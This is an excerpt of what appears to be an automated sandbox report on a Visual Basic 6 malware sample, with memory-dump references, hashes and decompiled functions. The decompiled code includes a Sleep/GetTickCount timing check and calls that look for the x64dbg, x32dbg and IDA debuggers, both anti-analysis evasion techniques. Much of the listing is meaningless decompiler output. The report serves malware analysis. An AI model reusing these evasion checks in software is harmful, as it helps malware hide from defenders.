Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: LibraryLoad
String ID: SysAllocStringByteLen
API String ID: 1029625771-3231582829
Opcode ID: 928e818feef82b8b5ade7667e9d2e318f0dafe04b9105ba3cdd89b500c377a3e
Instruction ID: 4786639aa00aca25ce448d94d6f70ea65dda48d4caf6b45ac4aecbc24f6271e3
Opcode Fuzzy Hash: 928e818feef82b8b5ade7667e9d2e318f0dafe04b9105ba3cdd89b500c377a3e
Instruction Fuzzy Hash: E8011D30D40314AAD7607F61DE05B1537F4B7007AAFD0402AF50699297EFFC90679676

Uniqueness

Uniqueness Score: -1.00%

Function 0FA33250 Relevance: 1.6, APIs: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0FA33250() {
				signed char _t124;
				intOrPtr* _t125;
				signed char _t127;
				signed char _t129;
				signed char _t130;
				signed int _t131;
				signed int _t132;
				signed int _t134;
				intOrPtr* _t135;
				intOrPtr* _t136;
				signed char _t137;
				signed int _t145;
				intOrPtr _t146;
				signed char _t147;
				void* _t148;
				signed int _t149;
				signed int _t150;
				signed int _t151;
				signed int* _t152;
				intOrPtr* _t153;
				intOrPtr* _t155;
				signed char _t158;
				signed char _t160;
				signed char _t161;
				intOrPtr* _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				signed int _t170;
				void* _t171;
				signed int _t172;
				void* _t174;
				void* _t178;
				void* _t179;
				signed char _t187;
				void* _t188;
				signed int _t193;

				_push("VB5!6&VB6DE.DLL"); // executed
				L0FA33248(); // executed
				 *_t124 =  *_t124 + _t124;
				 *_t124 =  *_t124 + _t124;
				 *_t124 =  *_t124 + _t124;
				 *_t124 =  *_t124 ^ _t124;
				 *_t124 =  *_t124 + _t124;
				_t125 = _t124 + 1;
				 *_t125 =  *_t125 + _t125;
				 *_t125 =  *_t125 + _t125;
				 *_t125 =  *_t125 + _t125;
				 *((intOrPtr*)(_t166 - 0x14f81d4a)) =  *((intOrPtr*)(_t166 - 0x14f81d4a)) + _t125;
				asm("sbb [esi+eax*2+0x6b3e37af], edx");
				_t149 = _t148 - 1;
				_pop(_t127);
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				_t179 =  *_t127;
				 *_t149 =  *_t149 >> 0xb;
				_pop(es);
				_push(_t152);
				asm("gs insd");
				asm("popad");
				if(_t179 < 0) {
					L3:
					asm("sgdt [eax]");
					_t127 = _t127 +  *_t127;
					asm("rcl byte [edi-0x5d], 1");
					asm("sldt word [eax]");
					 *_t127 =  *_t127 + _t127;
					asm("invalid");
					asm("invalid");
					asm("invalid");
					asm("invalid");
					 *_t127 =  *_t127 + _t127;
					L4:
					 *_t127 =  *_t127 + _t127;
					 *0xa882240f = 0x58;
					asm("sldt word [eax]");
					 *0x58 =  *0x58 + 0x58;
					asm("loopne 0x26");
					asm("fild word [edi]");
					 *0x58 =  *0x58 + 0x58;
					 *0x58 =  *0x58 + 0x58;
					 *0x58 =  *0x58 + 0x58;
					 *0x58 =  *0x58 + 0x58;
					 *0x58 =  *0x58 + 0x58;
					 *0x58 =  *0x58 + 0x58;
					 *_t149 =  *_t149 ^ _t158;
					 *0x10f = 0x58;
					_t129 = 0x58 + _t158;
					_push(_t164);
					 *0xf = _t129;
					_t150 = _t149 + _t149;
					asm("invalid");
					asm("invalid");
					asm("invalid");
					 *_t129 =  *_t129 + 1;
					 *_t129 =  *_t129 + _t129;
					 *((intOrPtr*)(_t129 + _t150 * 2)) =  *((intOrPtr*)(_t129 + _t150 * 2)) + 0x58;
					 *0xa881c80f = _t129;
					asm("sldt word [eax]");
					 *_t129 =  *_t129 + _t129;
					_t130 = _t129 ^ _t158;
					 *_t130 =  *_t130 + _t130;
					 *_t130 =  *_t130 + _t130;
					 *_t130 =  *_t130 + _t130;
					 *_t130 =  *_t130 + _t130;
					 *_t130 =  *_t130 + _t130;
					 *_t130 =  *_t130 + _t130;
					_push(0x10fa333);
					 *_t152 =  *_t152 + _t130;
					_t131 = _t130 + _t158;
					_push(_t164);
					 *0xf = _t131;
					_t151 = _t150 + _t150;
					asm("invalid");
					asm("invalid");
					asm("invalid");
					 *_t131 =  *_t131 + 1;
					 *_t131 =  *_t131 + _t131;
					 *((intOrPtr*)(_t131 + _t151 * 2 - 0x5d)) =  *((intOrPtr*)(_t131 + _t151 * 2 - 0x5d)) + _t158;
					asm("invalid");
					 *((intOrPtr*)(_t131 + 0x30f)) =  *((intOrPtr*)(_t131 + 0x30f)) - 0xa333a400;
					asm("sgdt [eax]");
					 *_t131 =  *_t131 & _t131;
					 *_t131 =  *_t131 + _t131;
					 *_t131 =  *_t131 + _t131;
					if( *_t131 >= 0) {
						_t131 =  *0x600fa333;
						_pop(_t158);
						 *0xf = _t131;
						 *((intOrPtr*)(_t131 + _t131 - 0x2eff7aff)) =  *((intOrPtr*)(_t131 + _t131 - 0x2eff7aff)) + _t131;
						 *_t131 = _t152 +  *_t131;
						_push(_t166);
					}
					_t132 = _t131 ^ 0x56263621;
					_t160 = _t158 + 2;
					_t171 = _t170 + 1;
					_t178 = _t174 + 2;
					 *_t132 =  *_t132 + _t132;
					 *_t132 =  *_t132 + _t132;
					 *_t160 =  *_t160 + _t152;
					 *_t132 =  *_t132 + _t132;
					 *_t132 =  *_t132 + _t132;
					 *_t132 =  *_t132 + _t132;
					 *_t132 =  *_t132 + _t132;
					 *_t132 =  *_t132 + _t132;
					 *_t132 =  *_t132 + _t132;
					 *_t160 =  *_t160 + _t152;
					 *_t164 =  *_t164 + _t132;
					 *_t152 = _t152 +  *_t152;
					_t134 = _t132;
					 *((intOrPtr*)(_t134 - 0x56)) =  *((intOrPtr*)(_t134 - 0x56)) + _t160;
					asm("movsb");
					asm("wrmsr");
					 *_t134 =  *_t134 + _t134;
					asm("invalid");
					 *_t134 =  *_t134 - 1;
					 *_t134 =  *_t134 + _t134;
					 *_t152 =  *_t152 + _t134;
					 *_t134 =  *_t134 + _t134;
					 *(_t134 + _t134) =  *(_t134 + _t134) + _t134;
					_pop(es);
					_t153 = _t152 + _t152;
					 *_t134 =  *_t134 + _t134;
					 *((intOrPtr*)(_t134 + 0x34)) =  *((intOrPtr*)(_t134 + 0x34)) + _t160;
					 *0xa344f00f = _t134;
					asm("subps xmm6, [edx]");
					 *0x780f = _t134;
					 *((intOrPtr*)(_t166 - 0x6e000000)) =  *((intOrPtr*)(_t166 - 0x6e000000)) + _t134;
					 *_t134 =  *_t134 + _t134;
					 *_t151 =  *_t151 + _t160;
					 *_t134 =  *_t134 + _t134;
					 *_t134 =  *_t134 + _t134;
					 *_t134 =  *_t134 + _t134;
					 *_t134 =  *_t134 + _t134;
					 *_t134 =  *_t134 + _t134;
					 *_t134 =  *_t134 + _t134;
					 *_t134 =  *_t134 + _t134;
					 *((intOrPtr*)(_t164 + 0x65)) =  *((intOrPtr*)(_t164 + 0x65)) + _t160;
					asm("arpl [ecx+0x61], si");
					_t161 = _t160 ^  *(_t160 + 0x61);
					_t187 = _t161;
					asm("aaa");
					asm("outsb");
					if(_t187 <= 0) {
						L13:
						_t134 = _t134 + _t134;
						asm("insb");
						 *0x4c0f = _t134;
						 *_t134 =  *_t134 + _t161;
						goto L14;
					} else {
						if (_t187 < 0) goto L8;
						_push(_t153);
						asm("gs insd");
						asm("popad");
						if(_t187 < 0) {
							L14:
							 *_t134 =  *_t134 + _t134;
							 *((intOrPtr*)(_t153 - 0x1a22372f)) =  *((intOrPtr*)(_t153 - 0x1a22372f)) + _t153;
							asm("scasb");
							_t134 = _t134 - 1;
							_t153 = _t153;
							L15:
							asm("les esi, [esp+ecx*4+0xa]");
							_t161 =  *_t166;
							L16:
							 *_t134 =  *_t134 + _t134;
							 *_t134 =  *_t134 + _t134;
							 *_t134 =  *_t134 + _t134;
							 *_t134 =  *_t134 + _t134;
							 *_t134 =  *_t134 + _t134;
							 *_t134 =  *_t134 + _t134;
							_t134 = _t134 + 0x80000000;
							_t193 = _t134;
							L17:
							 *_t134 =  *_t134 + _t134;
							 *((intOrPtr*)(_t134 + 3)) =  *((intOrPtr*)(_t134 + 3)) + _t134;
							 *_t134 =  *_t134 + _t134;
							 *_t134 =  *_t134 + _t134;
							 *_t134 =  *_t134 + _t134;
							 *_t134 =  *_t134 + _t134;
							 *_t134 =  *_t134 + _t134;
							 *_t134 =  *_t134 + _t134;
							 *_t134 =  *_t134 + _t134;
							 *_t134 =  *_t134 + _t134;
							 *_t134 =  *_t134 + _t134;
							 *((intOrPtr*)(_t153 + 0x27)) =  *((intOrPtr*)(_t153 + 0x27)) + _t134;
							 *_t134 =  *_t134 + _t134;
							 *_t134 =  *_t134 + _t134;
							 *_t134 =  *_t134 + _t134;
							 *(_t161 - 0x5d) =  *(_t161 - 0x5d) | _t161;
							 *_t134 = _t193 < 0;
							 *_t134 =  *_t134 + _t134;
							_push(_t134);
							 *_t134 =  *_t134 + _t134;
							 *_t153 =  *_t153 + _t153;
							asm("a16 int3");
							asm("int3");
							asm("retf 0x6abc");
							_t172 = _t171 + 1;
							asm("movsb");
							_t165 =  *_t166 * 0x2f;
							asm("o16 and al, [eax]");
							 *_t134 =  *_t134 + _t134;
							 *_t134 =  *_t134 + _t134;
							 *_t134 =  *_t134 + _t134;
							 *_t134 =  *_t134 + _t134;
							 *_t134 =  *_t134 + _t134;
							 *_t134 =  *_t134 + _t134;
							 *_t134 =  *_t134 + _t134;
							 *_t166 =  *_t166 + _t134;
							 *_t134 =  *_t134 + _t134;
							 *_t134 =  *_t134 + _t134;
							_t135 = _t134 +  *_t134;
							 *_t135 =  *_t135 + _t135;
							 *_t135 =  *_t135 + _t135;
							 *_t135 =  *_t135 + _t135;
							 *_t135 =  *_t135 + _t135;
							 *_t135 =  *_t135 + _t135;
							 *_t135 =  *_t135 + _t135;
							 *_t135 =  *_t135 + _t135;
							 *_t135 =  *_t135 + _t135;
							 *_t135 =  *_t135 + _t135;
							 *_t135 =  *_t135 + _t135;
							 *((intOrPtr*)(_t153 + 4)) =  *((intOrPtr*)(_t153 + 4)) + _t135;
							 *_t135 =  *_t135 + _t135;
							 *((intOrPtr*)(_t172 + 0xec0fa3 + _t172 * 2)) =  *((intOrPtr*)(_t172 + 0xec0fa3 + _t172 * 2)) + _t135;
							 *_t135 =  *_t135 + _t135;
							 *_t135 =  *_t135 + _t135;
							_t155 = _t153 + _t151;
							 *(_t155 + _t151 * 2) =  *(_t155 + _t151 * 2) & 0x0000004c;
							asm("cdq");
							_t167 = _t166 & 0xffffff9b;
							_t136 = _t135 - 1;
							 *_t136 =  *_t136 + _t136;
							 *_t136 =  *_t136 + _t136;
							 *_t136 =  *_t136 + _t136;
							 *_t136 =  *_t136 + _t136;
							 *_t136 =  *_t136 + _t136;
							 *_t136 =  *_t136 + _t136;
							 *_t136 =  *_t136 + _t136;
							 *_t136 =  *_t136 + _t136;
							es = _t135;
							 *_t136 =  *_t136 + _t136;
							 *_t136 =  *_t136 + _t136;
							 *_t136 =  *_t136 + _t136;
							 *_t136 =  *_t136 + _t136;
							 *_t136 =  *_t136 + _t136;
							 *_t136 =  *_t136 + _t136;
							 *_t136 =  *_t136 + _t136;
							 *_t136 =  *_t136 + _t136;
							 *_t136 =  *_t136 + _t136;
							 *_t136 =  *_t136 + _t136;
							 *_t136 =  *_t136 + _t136;
							 *_t136 =  *_t136 + _t136;
							 *_t136 =  *_t136 + _t136;
							 *0x6d =  *0x6d + _t136;
							 *_t136 =  *_t136 + _t136;
							 *((intOrPtr*)(_t178 + _t172 * 2)) =  *((intOrPtr*)(_t178 + _t172 * 2)) + _t151;
							 *0x13c0f = _t136;
							 *_t155 =  *_t155 + _t136;
							 *_t165 =  *_t165 + _t136;
							_t137 = _t136 + 0x6d;
							_push(_t165);
							 *0xf = _t137;
							 *((intOrPtr*)(0x6d + _t151 * 4 - 0xf05c)) =  *((intOrPtr*)(0x6d + _t151 * 4 - 0xf05c)) + _t155;
							asm("invalid");
							 *_t137 =  *_t137 + _t137;
							 *_t137 =  *_t137 + _t137;
							if( *_t137 == 0) {
								L20:
								 *((intOrPtr*)(_t165 - 0x25)) =  *((intOrPtr*)(_t165 - 0x25)) + _t151;
							}
							 *0xa882c80f = _t137;
							0xf[_t137] = 0xf[_t137];
							asm("sbb al, ah");
							asm("in eax, 0x7");
							 *_t137 =  *_t137 + _t137;
							 *_t137 =  *_t137 + _t137;
							 *_t137 =  *_t137 + _t137;
							 *_t137 =  *_t137 + _t137;
							 *_t137 =  *_t137 + _t137;
							 *_t137 =  *_t137 + _t137;
							 *_t167 =  *_t167 | 0x0000006d;
							 *0x10f = _t137;
							 *((intOrPtr*)(_t178 + _t172 * 2)) =  *((intOrPtr*)(_t178 + _t172 * 2)) + _t155;
							 *0xf = _t137;
							 *_t137 =  *_t137 + _t155;
							 *[ss:0x10f] = _t137;
							 *_t137 =  *_t137 + 0x6d;
							 *[ss:0xf] = _t137;
							 *((intOrPtr*)(_t167 + _t167)) =  *((intOrPtr*)(_t167 + _t167)) + _t155;
							 *0x10f = _t137;
							 *_t137 =  *_t137 + 0x6d;
							 *[ss:0xb700010f] = _t137;
							 *_t137 =  *_t137 + _t172;
							asm("insb");
							 *_t137 =  *_t137 + _t151;
							 *[ss:0xa8884c0f] = _t137;
							asm("sldt word [eax]");
							 *_t137 =  *_t137 + _t137;
							goto L20;
						}
						asm("o16 jbe 0x66");
						if(_t187 != 0) {
							goto L16;
						}
						 *_t134 =  *_t134 + _t134;
						_t188 =  *_t134;
						_push(_t153);
						asm("gs insd");
						asm("popad");
						if(_t188 < 0) {
							goto L15;
						}
						asm("o16 jbe 0x66");
						if(_t188 != 0) {
							goto L17;
						}
						 *_t134 =  *_t134 + _t134;
						_push(_t134);
						 *_t134 =  *_t134 + _t134;
						_t151 = _t151 + _t153;
						ss =  *((intOrPtr*)(_t161 - 0x1d));
						_t153 = 0x46;
						_t145 = _t161 - 0x64;
						 *_t161 =  *_t161 & 0x00000046;
						 *_t145 =  *_t145 + _t145;
						 *_t145 =  *_t145 + _t145;
						 *_t145 =  *_t145 + _t145;
						 *_t145 =  *_t145 + _t145;
						 *_t145 =  *_t145 + _t145;
						 *_t145 =  *_t145 + _t145;
						_t134 = _t145;
						 *_t134 =  *_t134 + _t134;
						 *_t134 =  *_t134 + _t134;
						 *_t134 =  *_t134 + _t134;
						 *_t134 =  *_t134 + _t134;
						 *_t134 =  *_t134 + _t134;
						 *_t134 =  *_t134 + _t134;
						 *_t134 =  *_t134 + _t134;
						 *_t134 =  *_t134 + _t134;
						 *_t134 =  *_t134 + _t134;
						 *_t134 =  *_t134 + _t134;
						 *_t134 =  *_t134 + _t134;
						 *_t134 =  *_t134 + _t134;
						 *_t134 =  *_t134 + _t134;
						 *0 = _t134;
						 *_t134 =  *_t134 + _t134;
						goto L13;
					}
				}
				asm("o16 jbe 0x66");
				if(_t179 != 0) {
					goto L4;
				}
				 *_t127 =  *_t127 + _t127;
				 *_t152 =  *_t152 | _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *((intOrPtr*)(_t149 + 0x70fa3 + _t170 * 2)) =  *((intOrPtr*)(_t149 + 0x70fa3 + _t170 * 2)) + _t152;
				 *_t127 =  *_t127 + _t127;
				 *0x70f = _t127;
				 *((intOrPtr*)(_t127 + 0x5b)) =  *((intOrPtr*)(_t127 + 0x5b)) + _t152;
				 *0x70f = _t127;
				_t146 = _t152 + _t127;
				_t158 = es;
				 *0x200010f = _t146;
				_t147 = _t146 + _t158;
				_push(_t164);
				 *0xf = _t147;
				_t149 = _t149 + _t149;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t147 =  *_t147 + 1;
				 *_t147 =  *_t147 + _t147;
				 *((intOrPtr*)(_t147 + _t149 * 2 - 0x7e1ff05d)) =  *((intOrPtr*)(_t147 + _t149 * 2 - 0x7e1ff05d)) + _t147;
				 *_t147 =  *_t147 + _t147;
				 *_t147 =  *_t147 + _t147;
				asm("lock out dx, al");
				asm("loope 0x9");
				 *_t147 =  *_t147 + _t147;
				 *_t147 =  *_t147 + _t147;
				 *_t147 =  *_t147 + _t147;
				 *_t147 =  *_t147 + _t147;
				 *_t147 =  *_t147 + _t147;
				 *_t147 =  *_t147 + _t147;
				asm("clc");
				_t127 = _t147 ^  *(_t149 + 0x300010f);
				goto L3;
			}

0x0fa33250
0x0fa33255
0x0fa3325a
0x0fa3325c
0x0fa3325e
0x0fa33260
0x0fa33262
0x0fa33264
0x0fa33265
0x0fa33267
0x0fa33269
0x0fa3326b
0x0fa33271
0x0fa3327a
0x0fa3327b
0x0fa3327c
0x0fa3327e
0x0fa33280
0x0fa33282
0x0fa33284
0x0fa33286
0x0fa33286
0x0fa33288
0x0fa3328b
0x0fa3328c
0x0fa3328d
0x0fa3328f
0x0fa33290
0x0fa332f7
0x0fa332f7
0x0fa332fa
0x0fa332fc
0x0fa332ff
0x0fa33302
0x0fa33304
0x0fa33306
0x0fa33308
0x0fa3330a
0x0fa3330c
0x0fa3330e
0x0fa3330e
0x0fa33312
0x0fa33317
0x0fa3331a
0x0fa3331c
0x0fa3331e
0x0fa33320
0x0fa33322
0x0fa33324
0x0fa33326
0x0fa33328
0x0fa3332a
0x0fa3332c
0x0fa3332e
0x0fa33333
0x0fa33335
0x0fa33336
0x0fa3333b
0x0fa3333d
0x0fa3333f
0x0fa33341
0x0fa33343
0x0fa33345
0x0fa33347
0x0fa3334a
0x0fa3334f
0x0fa33352
0x0fa33354
0x0fa33358
0x0fa3335a
0x0fa3335c
0x0fa3335e
0x0fa33360
0x0fa33362
0x0fa33364
0x0fa33369
0x0fa3336b
0x0fa3336d
0x0fa3336e
0x0fa33373
0x0fa33375
0x0fa33377
0x0fa33379
0x0fa3337b
0x0fa3337d
0x0fa3337f
0x0fa33383
0x0fa33385
0x0fa3338f
0x0fa33392
0x0fa33394
0x0fa33396
0x0fa33398
0x0fa3339c
0x0fa333a1
0x0fa333a2
0x0fa333a7
0x0fa333ae
0x0fa333b0
0x0fa333b0
0x0fa333b2
0x0fa333b7
0x0fa333ba
0x0fa333be
0x0fa333bf
0x0fa333c1
0x0fa333c3
0x0fa333c5
0x0fa333c7
0x0fa333c9
0x0fa333cb
0x0fa333cd
0x0fa333cf
0x0fa333d1
0x0fa333d3
0x0fa333d7
0x0fa333d9
0x0fa333db
0x0fa333de
0x0fa333df
0x0fa333e7
0x0fa333e9
0x0fa333eb
0x0fa333ed
0x0fa333ef
0x0fa333f1
0x0fa333f3
0x0fa333f6
0x0fa333f7
0x0fa333f9
0x0fa333fb
0x0fa333fe
0x0fa33403
0x0fa33406
0x0fa3340b
0x0fa33411
0x0fa33413
0x0fa33419
0x0fa3341b
0x0fa3341d
0x0fa3341f
0x0fa33421
0x0fa33423
0x0fa33425
0x0fa33427
0x0fa3342a
0x0fa3342d
0x0fa3342d
0x0fa33430
0x0fa33431
0x0fa33432
0x0fa33497
0x0fa33497
0x0fa33499
0x0fa3349a
0x0fa3349f
0x00000000
0x0fa33434
0x0fa33434
0x0fa33436
0x0fa33437
0x0fa33439
0x0fa3343a
0x0fa334a1
0x0fa334a1
0x0fa334a3
0x0fa334aa
0x0fa334ab
0x0fa334ad
0x0fa334ae
0x0fa334ae
0x0fa334b2
0x0fa334b8
0x0fa334b8
0x0fa334ba
0x0fa334bc
0x0fa334be
0x0fa334c0
0x0fa334c2
0x0fa334c4
0x0fa334c4
0x0fa334c5
0x0fa334c5
0x0fa334c7
0x0fa334cd
0x0fa334cf
0x0fa334d1
0x0fa334d3
0x0fa334d5
0x0fa334d7
0x0fa334d9
0x0fa334db
0x0fa334dd
0x0fa334df
0x0fa334e2
0x0fa334e4
0x0fa334e6
0x0fa334e8
0x0fa334eb
0x0fa334ee
0x0fa334f0
0x0fa334f1
0x0fa334f3
0x0fa334f5
0x0fa334f7
0x0fa334f8
0x0fa334fb
0x0fa334fc
0x0fa334ff
0x0fa33502
0x0fa33505
0x0fa33507
0x0fa33509
0x0fa3350b
0x0fa3350d
0x0fa3350f
0x0fa33511
0x0fa33513
0x0fa33515
0x0fa33517
0x0fa33519
0x0fa3351b
0x0fa3351d
0x0fa3351f
0x0fa33521
0x0fa33523
0x0fa33525
0x0fa33527
0x0fa33529
0x0fa3352b
0x0fa3352d
0x0fa3352f
0x0fa33535
0x0fa33537
0x0fa3353e
0x0fa33541
0x0fa33543
0x0fa33548
0x0fa3354d
0x0fa33550
0x0fa33553
0x0fa33554
0x0fa33556
0x0fa33558
0x0fa3355a
0x0fa3355c
0x0fa3355e
0x0fa33560
0x0fa33562
0x0fa33564
0x0fa33565
0x0fa33567
0x0fa33569
0x0fa3356b
0x0fa3356d
0x0fa3356f
0x0fa33571
0x0fa33573
0x0fa33575
0x0fa33577
0x0fa33579
0x0fa3357b
0x0fa3357d
0x0fa3357f
0x0fa33585
0x0fa33587
0x0fa3358a
0x0fa3358f
0x0fa33591
0x0fa33593
0x0fa33595
0x0fa33596
0x0fa3359b
0x0fa335a2
0x0fa335a4
0x0fa335a6
0x0fa335a8
0x0fa33603
0x0fa33603
0x0fa33603
0x0fa335aa
0x0fa335ad
0x0fa335b4
0x0fa335b6
0x0fa335b8
0x0fa335ba
0x0fa335bc
0x0fa335be
0x0fa335c0
0x0fa335c2
0x0fa335c4
0x0fa335c6
0x0fa335cb
0x0fa335ce
0x0fa335d3
0x0fa335d5
0x0fa335db
0x0fa335dd
0x0fa335e3
0x0fa335e6
0x0fa335eb
0x0fa335ed
0x0fa335f3
0x0fa335f6
0x0fa335f7
0x0fa335f9
0x0fa335ff
0x0fa33602
0x00000000
0x0fa33602
0x0fa3343c
0x0fa3343f
0x00000000
0x00000000
0x0fa33441
0x0fa33441
0x0fa33443
0x0fa33444
0x0fa33446
0x0fa33447
0x00000000
0x00000000
0x0fa33449
0x0fa3344c
0x00000000
0x00000000
0x0fa3344e
0x0fa33450
0x0fa33451
0x0fa33453
0x0fa33457
0x0fa3345a
0x0fa3345c
0x0fa33461
0x0fa33468
0x0fa3346a
0x0fa3346c
0x0fa3346e
0x0fa33470
0x0fa33472
0x0fa33474
0x0fa33476
0x0fa33478
0x0fa3347a
0x0fa3347c
0x0fa3347e
0x0fa33480
0x0fa33482
0x0fa33484
0x0fa33486
0x0fa33488
0x0fa3348a
0x0fa3348c
0x0fa3348e
0x0fa33490
0x0fa33495
0x00000000
0x0fa33495
0x0fa33432
0x0fa33292
0x0fa33295
0x00000000
0x00000000
0x0fa33297
0x0fa33299
0x0fa3329c
0x0fa3329e
0x0fa332a1
0x0fa332a3
0x0fa332aa
0x0fa332ae
0x0fa332b3
0x0fa332b6
0x0fa332bb
0x0fa332bd
0x0fa332be
0x0fa332c3
0x0fa332c5
0x0fa332c6
0x0fa332cb
0x0fa332cd
0x0fa332cf
0x0fa332d1
0x0fa332d3
0x0fa332d5
0x0fa332d7
0x0fa332e0
0x0fa332e2
0x0fa332e4
0x0fa332e6
0x0fa332e8
0x0fa332ea
0x0fa332ec
0x0fa332ee
0x0fa332f0
0x0fa332f2
0x0fa332f4
0x0fa332f5
0x00000000

APIs

#100.MSVBVM60(Function_00003250), ref: 0FA33255

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: #100
String ID:
API String ID: 1341478452-0
Opcode ID: 872ad55831653930858a93cff7ba27916721d20017a57d32ffe064b7e0a68ba0
Instruction ID: c0dac5bc443e8c9026731e7b3bf525eca53ba1134d4a55222f191f50ae07ea7f
Opcode Fuzzy Hash: 872ad55831653930858a93cff7ba27916721d20017a57d32ffe064b7e0a68ba0
Instruction Fuzzy Hash: 1221BF6184E7C1DFD7234BB49C61281BFB0AF13620B0A45EBD084DF4B3D66C18AAD726

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0FA4BF50 Relevance: 4.5, APIs: 3, Instructions: 17
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FA4BF50() {
				long _t4;
				intOrPtr _t11;

				 *0xfa88200 = GetTickCount();
				Sleep(0x1f4);
				_t4 = GetTickCount();
				_t11 =  *0xfa88200; // 0x0
				 *0xfa88204 = _t4;
				return (0 | _t4 - _t11 - 0x000001f4 >= 0x00000000) - 1;
			}

0x0fa4bf5e
0x0fa4bf63
0x0fa4bf69
0x0fa4bf6b
0x0fa4bf71
0x0fa4bf86

APIs

GetTickCount.KERNEL32(72A46AEE,0FA4AF12), ref: 0FA4BF57
Sleep.KERNEL32(000001F4), ref: 0FA4BF63
GetTickCount.KERNEL32 ref: 0FA4BF69

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: CountTick$Sleep
String ID:
API String ID: 4250438611-0
Opcode ID: 516ddc89916c5f84d58ca1c4a2ec704b37be200f6ed87fb16b3c7ccf94136f5b
Instruction ID: bf083c645a2ada49e72265bd8c801e2493cbe81212b3c90d2cbf9a10cf166b63
Opcode Fuzzy Hash: 516ddc89916c5f84d58ca1c4a2ec704b37be200f6ed87fb16b3c7ccf94136f5b
Instruction Fuzzy Hash: 84D05E70D505614BDB045F3CAD040C53B54B705332704403BE021DB3C0FFB858238B80

Uniqueness

Uniqueness Score: -1.00%

Function 0FA49BC0 Relevance: 147.4, APIs: 76, Strings: 8, Instructions: 404COMMON

Download Yara Rule

APIs

#644.MSVBVM60(x64dbg,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49C0B
#644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49C10
__vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49C22
#644.MSVBVM60(x32dbg,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49C41
#644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49C47
__vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49C56
#644.MSVBVM60(IDA,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49C75
#644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49C7B
__vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49C8A
__vbaStrCat.MSVBVM60(0FA35EA4,0FA35E9C,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49CB4
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49CC1
__vbaStrCat.MSVBVM60(0FA35EAC,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49CC9
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49CD0
__vbaStrCat.MSVBVM60(0FA35EB4,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49CD8
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49CDF
